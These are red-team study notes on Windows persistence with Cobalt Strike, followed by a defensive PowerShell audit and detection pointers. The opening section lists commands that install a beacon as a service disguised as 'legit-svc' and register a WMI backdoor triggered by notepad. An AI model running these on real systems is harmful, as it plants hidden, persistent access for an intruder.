Elevated

Cobalt: SYSTEM processes cannot authenticate to the web proxy, so we can't use HTTP Beacons. Use P2P or DNS Beacons instead.

Windows Services

Upload and add service

cd C:\Windows
upload C:\Payloads\tcp-local_x64.svc.exe
mv tcp-local_x64.svc.exe legit-svc.exe

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add

WMI Event Subscriptions

When notepad starts, execute the payload

cd C:\Windows
upload C:\Payloads\dns_x64.exe
powershell-import C:\Tools\PowerLurk.ps1
powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

Get-WmiEvent -Name WmiBackdoor

Revert: Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject
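Defensive counterpart, added here and not part of the original notes or of Cobalt Strike, SharPersist or PowerLurk: a Windows PowerShell audit that lists permanent WMI event subscriptions and recent service installs, the two persistence mechanisms above. The seven-day window and the "Suspicious" heuristic are this example's own choices; run it in an elevated session.

```powershell
# Added audit example (not from the original notes). Enumerates the two
# persistence mechanisms described above so a defender can spot them.

function Get-WmiPersistence {
    # Permanent subscriptions live in root\subscription: a filter (WQL query),
    # a consumer (what runs) and a binding that ties the two together.
    $ns = 'root/subscription'
    $filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
    $consumers = Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer
    $bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding

    foreach ($b in $bindings) {
        # Reference properties normally surface as CimInstance objects; fall back
        # to parsing the object path if a provider hands back a string instead.
        $fName = if ($b.Filter -is [string])   { [regex]::Match($b.Filter,   'Name="([^"]+)"').Groups[1].Value } else { $b.Filter.Name }
        $cName = if ($b.Consumer -is [string]) { [regex]::Match($b.Consumer, 'Name="([^"]+)"').Groups[1].Value } else { $b.Consumer.Name }
        $f = $filters   | Where-Object Name -eq $fName
        $c = $consumers | Where-Object Name -eq $cName
        [pscustomobject]@{
            Filter      = $fName
            Query       = $f.Query
            Consumer    = $cName
            CommandLine = $c.CommandLineTemplate
            # Heuristic: a command-line consumer bound to a process-start trigger
            # is exactly the shape of the notepad backdoor registered above.
            Suspicious  = ($null -ne $c) -and ($f.Query -match 'Win32_ProcessStartTrace|__InstanceCreationEvent')
        }
    }
}

function Get-RecentServiceInstalls {
    param([int]$Days = 7)   # lookback window is an arbitrary example choice
    # System event 7045 is written whenever a new service is installed
    # (Security 4697 records the same when object-access auditing is on).
    $start = (Get-Date).AddDays(-$Days)
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $start } -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                ServiceName = $_.Properties[0].Value
                ImagePath   = $_.Properties[1].Value
                Account     = $_.Properties[4].Value
            }
        }
}

Get-WmiPersistence        | Format-Table -AutoSize
Get-RecentServiceInstalls | Format-Table -AutoSize
```

For live alerting rather than a point-in-time audit, Sysmon event IDs 19, 20 and 21 and Microsoft-Windows-WMI-Activity/Operational event 5861 record the same filter, consumer and binding registrations as they happen.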

Tooling
